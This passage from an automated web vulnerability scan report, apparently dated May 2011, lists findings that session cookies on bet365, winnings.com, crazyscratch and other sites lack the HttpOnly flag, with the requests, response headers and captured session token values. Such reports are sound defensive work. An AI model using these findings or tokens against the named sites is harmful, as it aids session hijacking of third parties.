GET /extra/en/online-games/live-dealer HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.8. http://casino.bet365.com/extra/en/online-games/roulette previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/roulette

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:32:24 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/roulette HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.9. http://casino.bet365.com/home/en/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://casino.bet365.com
Path:	/home/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.10. http://da.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://da.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCARSTDDC=JBNNJMIAHMINGLJOBEHEKAJG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: da.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16448
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCARSTDDC=JBNNJMIAHMINGLJOBEHEKAJG; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.11. http://da.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://da.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123277; path=/; domain=.winnings.com
WinningsSID=82gun5s9aot32rckk6dr6ngt71; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540655; expires=Tue, 15-May-2012 12:26:10 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: da.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.12. http://de.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://de.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACRRSDCC=BEDLBLIAHMGKLDCOEOIHGGKL; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: de.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18626
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACRRSDCC=BEDLBLIAHMGKLDCOEOIHGGKL; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.13. http://de.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://de.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103122867; path=/; domain=.winnings.com
WinningsSID=bo2hr723r5jhqb7k8l55c0tsp6; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540255; expires=Tue, 15-May-2012 12:00:03 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: de.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.14. http://el.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://el.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCRRQDCC=FOMFJMIALPNODOAGMPEJOAIG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: el.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28375
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRRQDCC=FOMFJMIALPNODOAGMPEJOAIG; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.15. http://el.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://el.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123004; path=/; domain=.winnings.com
WinningsSID=m2prtrifja8qi72631j36fguj0; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540388; expires=Tue, 15-May-2012 12:08:44 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: el.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.16. http://en.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://en.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCQSSDCC=IABHDNIANOMHCONFDHMFEEBD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: en.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18921
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQSSDCC=IABHDNIANOMHCONFDHMFEEBD; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.17. http://es.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://es.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCRRQCCC=IOPLANIADMGNMLBCGHMNMEDC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: es.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16677
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRRQCCC=IOPLANIADMGNMLBCGHMNMEDC; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.18. http://es.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://es.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123528; path=/; domain=.winnings.com
WinningsSID=6rfpoaacmos3pqv6u74edo7v02; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540903; expires=Tue, 15-May-2012 12:32:13 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: es.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.19. http://fi.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fi.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAARQQDCC=NGCNCBIAHNMGKJGFAHJGJHCA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: fi.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18619
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARQQDCC=NGCNCBIAHNMGKJGFAHJGJHCA; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.20. http://fi.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fi.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123051; path=/; domain=.winnings.com
WinningsSID=hhfnpksu4siu4pfgu3cjt3vs45; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540431; expires=Tue, 15-May-2012 12:10:55 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fi.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.21. http://fr.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fr.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACRSTADC=MPHFNLIADMMJPCONDIALEPBN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: fr.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17049
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACRSTADC=MPHFNLIADMMJPCONDIALEPBN; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.22. http://fr.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fr.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123274; path=/; domain=.winnings.com
WinningsSID=ct2se4ekv495kv3bi8qnrrbis5; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540651; expires=Tue, 15-May-2012 12:26:04 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fr.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.23. http://games.bet365.com/en/scratchcards/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.bet365.com
Path:	/en/scratchcards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=9C2C33F10D514043B2DACC213223040E000002; path=/
stk=9C2C33F10D514043B2DACC213223040E000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:02:14 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/scratchcards/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:15 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rbfdlb45oeclse550xfm3c45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=9C2C33F10D514043B2DACC213223040E000002; path=/
Set-Cookie: session=stk=9C2C33F10D514043B2DACC213223040E000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:14 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:14 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 75482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.24. http://games.bet365.com/home/en/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.bet365.com
Path:	/home/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.25. http://getclicky.com/66384109 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://getclicky.com
Path:	/66384109

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=8adbf56b6cdc8626904763e06aeaa6ad; path=/
referer=66372715; expires=Fri, 15 Jul 2011 12:45:21 GMT; path=/; domain=.getclicky.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /66384109 HTTP/1.1
Host: getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.26. https://help.betsson.com/display/4/kb/faq/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://help.betsson.com
Path:	/display/4/kb/faq/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=qiv3sin4m5umjyaekpf4yp55; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/4/kb/faq/index.aspx HTTP/1.1
Host: help.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.27. http://hu.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://hu.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAAQRQCCD=BFHPCOIAGFLFGBMJJMBHDPFH; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hu.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18194
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAAQRQCCD=BFHPCOIAGFLFGBMJJMBHDPFH; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...

12.28. http://it.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://it.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAARSRCDC=BELFFMIAILCNBCJKGGKCBCHH; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: it.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18951
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARSRCDC=BELFFMIAILCNBCJKGGKCBCHH; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.29. http://mad4milk.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://mad4milk.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220dab13bb74e8811bc287a4f680ca7c35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1305547348%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Mon, 16-May-2011 14:02:28 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:27 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220dab13bb74e8811bc287a4f680ca7c35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1305547348%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Mon, 16-May-2011 14:02:28 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-e
...[SNIP]...

12.30. https://members.bet365.com/members/chat/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://members.bet365.com
Path:	/members/chat/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=processform=0&stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /members/chat/ HTTP/1.1
Host: members.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.31. http://nl.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://nl.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCQRQBAB=KMJLBMIAIMKCGBFFEACGNOMP; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nl.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18732
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCQRQBAB=KMJLBMIAIMKCGBFFEACGNOMP; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.32. http://nl.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://nl.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123202; path=/; domain=.winnings.com
WinningsSID=9jhkgdc329m3l6ckield5tnpl7; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540579; expires=Tue, 15-May-2012 12:24:16 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nl.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.33. http://no.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://no.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCATTTBCD=BBMFHMIAJOLBHGOJKCNLIMLA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: no.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18690
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATTTBCD=BBMFHMIAJOLBHGOJKCNLIMLA; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:30:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.34. http://no.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://no.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123206; path=/; domain=.winnings.com
WinningsSID=tg684evsvkmguaeu71dlpar7c5; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540583; expires=Tue, 15-May-2012 12:24:21 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: no.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.35. http://poker.bet365.com/en/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://poker.bet365.com
Path:	/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=81AD5D02297642A69F86A8FBF75699E8000002; path=/
stk=81AD5D02297642A69F86A8FBF75699E8000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mq2ig2f2luddpk55rdwctimv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=81AD5D02297642A69F86A8FBF75699E8000002; path=/
Set-Cookie: session=stk=81AD5D02297642A69F86A8FBF75699E8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 85182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.36. http://poker.bet365.com/home/en/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://poker.bet365.com
Path:	/home/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.37. http://primescratchcards.com/images/bg.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://primescratchcards.com
Path:	/images/bg.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCQTRSBSQ=LOLOLGNDDJEFHNPIDEEICOGL; path=/
